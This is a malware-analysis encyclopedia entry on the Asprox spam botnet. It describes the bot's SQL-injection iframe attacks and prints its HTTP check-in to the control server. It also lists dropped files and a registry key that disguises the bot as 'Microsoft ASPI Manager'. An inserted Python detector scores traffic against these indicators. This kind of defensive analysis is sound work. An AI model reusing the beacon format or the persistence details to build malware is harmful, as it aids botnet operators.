Asprox

April 15, 2009

Aliases

  • Danmec (component of Asprox)
  • Hydraflux

Comments

Asprox first appeared as the spamming component of a password-stealing Trojan known as Danmec. Besides spamming, one of the main features of Asprox is its ability to perform SQL injection attacks against legitimate websites, embedding malicious <iframe> tags that point to a malicious URL. Asprox may propagate through spam emails containing links to a website hosting the Trojan, or when users visit malicious websites. The Pushdo/Cutwail spambot has been observed spamming the downloader Trojan Bredolab, which was responsible for distributing the Asprox executable.

Features

  • Template-based spamming engine
  • Fast-flux DNS to hide malware hosting sites
  • SQL injection attack capability

Spamming Rate

  • unknown

Command and Control

The Asprox bot first sends a TCP SYN to the following websites to check for Internet connectivity:

  • ns.uk2.net
  • www.yahoo.com
  • www.web.de

Once the bot receives a SYN/ACK reply from any of these websites, it connects to its control server with the following HTTP request:

POST /forum.php HTTP/1.1
Host: <control server IP address>:80
Use-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 850

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="sid"
4561555111697267
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="up"
638984
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="a_cl"
0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="p"
80
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wbfl"
1
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="v"
486
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ping"
1015
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="guid"
{229318B0-AEE3-4402-A785-DF2C862A16DC}
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="wv"
5#2#2#0#2600#0
--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="ms"
0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0
--1BEF0A57BE110FD467A--

The control server receives the request and replies with an encrypted template:

HTTP/1.1 200 OK
Server: nginx/0.6.34
Date: Tue, 27 Jan 2009 03:09:17 GMT
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"
Connection: close
Content-Length: 950

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream
<ENCRYPTED TEMPLATE> 

Updated:

As of May 2010, an updated Asprox version uses the following HTTP request:

POST /board.php HTTP/1.1
Host: <control server>:80
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Accept: */*
Accept-Language: en-gb
Accept-Encoding: deflate
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 603

The control server now uses Apache/2.2.9 as its server type:

HTTP/1.1 200 OK
Date: Wed, 26 May 2010 15:07:29 GMT
Server: Apache/2.2.9
Content-Length: 133422
Connection: close
Content-Type: multipart/form-data; boundary="1BEF0A57BE110FD467A"

--1BEF0A57BE110FD467A
Content-Disposition: form-data; name="COMMON"; filename="COMMON.BIN"
Content-Type: application/octet-stream
<ENCRYPTED TEMPLATE>

After the Asprox bot receives its spamming template and list of email addresses from the control server, it proceeds with its spamming routine.
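As an added defensive example (not part of the original entry), the following Python parses the multipart check-in shown above and scores it against the indicators this page documents: the request path, the fixed boundary string and the set of form field names. The sample body is constructed from the captured values; the format checks on the wv and ms fields and the three-indicator threshold are heuristics inferred from this single sample, not documented Asprox behaviour.

```python
import re

ASPROX_BOUNDARY = "1BEF0A57BE110FD467A"  # indicators below come from the check-in above
ASPROX_PATHS = {"/forum.php", "/board.php"}
ASPROX_FIELDS = {"sid", "up", "a_cl", "p", "wbfl", "v", "ping", "guid", "wv", "ms"}

def parse_multipart(body, boundary):
    """Lenient multipart parser: the Asprox beacon omits the blank line between a
    part's headers and its value, so headers are the leading 'Name: value' lines."""
    fields = {}
    for part in body.replace("\r\n", "\n").split("--" + boundary):
        lines = part.strip("\n").split("\n")
        headers, i = {}, 0
        while i < len(lines) and re.match(r"^[\w-]+:\s", lines[i]):
            name, _, value = lines[i].partition(":")
            headers[name.lower()] = value.strip()
            i += 1
        if i < len(lines) and lines[i] == "":
            i += 1  # standards-conforming parts put a blank line here
        m = re.search(r'name="([^"]+)"', headers.get("content-disposition", ""))
        if m:
            fields[m.group(1)] = "\n".join(lines[i:]).strip()
    return fields

def score_checkin(path, content_type, body):
    """Return (verdict, reasons); verdict is True when at least 3 indicators match (assumed threshold)."""
    m = re.search(r'boundary="?([^";\s]+)', content_type)
    boundary = m.group(1) if m else ""
    fields = parse_multipart(body, boundary) if boundary else {}
    checks = [
        (path in ASPROX_PATHS, "POST target " + path),
        (boundary == ASPROX_BOUNDARY, "hard-coded multipart boundary"),
        (ASPROX_FIELDS <= set(fields), "complete Asprox field set"),
        (bool(re.fullmatch(r"\d+(#\d+){5}", fields.get("wv", ""))), "wv is a '#'-joined version"),
        (bool(re.fullmatch(r"\d+(:\d+){16}", fields.get("ms", ""))), "ms is a 17-element list"),
    ]
    reasons = [why for hit, why in checks if hit]
    return len(reasons) >= 3, reasons

# Constructed sample for offline testing; field values are those captured above.
SAMPLE_FIELDS = {
    "sid": "4561555111697267", "up": "638984", "a_cl": "0", "p": "80", "wbfl": "1",
    "v": "486", "ping": "1015", "guid": "{229318B0-AEE3-4402-A785-DF2C862A16DC}",
    "wv": "5#2#2#0#2600#0", "ms": ":".join(["0"] * 17),
}

def build_body(fields=SAMPLE_FIELDS, boundary=ASPROX_BOUNDARY):
    """Assemble a body in the compact layout captured above (header line, then value)."""
    return "".join(f'--{boundary}\r\nContent-Disposition: form-data; name="{k}"\r\n{v}\r\n'
                   for k, v in fields.items()) + f"--{boundary}--\r\n"
```

A standards-conforming multipart body (blank line between part headers and value) is parsed by the same function, so the scorer also works on traffic reassembled by a proxy.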

Malware Behavior on Host

Asprox drops a copy of itself in the Windows system folder:

  • %SystemDir%\aspimgr.exe (example: C:\Windows\System32\aspimgr.exe)

It then drops a batch file in the Windows temporary folder to delete the original Trojan executable:

  • %temp%\_check32.bat

The following encrypted component files are also dropped on the infected system:

  • C:\Windows\db32.txt
  • C:\Windows\s32.txt
  • C:\Windows\ws386.ini

It registers itself as a service by adding the following registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\aspimgr
DisplayName = "Microsoft ASPI Manager"
ErrorControl = "1"
ImagePath = "%System%\aspimgr.exe"
ObjectName = "LocalSystem"
Start = "2"
Type = "10"

Addendum:

We have published a detailed analysis of the Asprox reappearance of 5 June 2010; the details are in our blog section. A separate write-up covers the Asprox SQL injection attack.

Last Reviewed: July 26, 2010 by Rodel Mendrez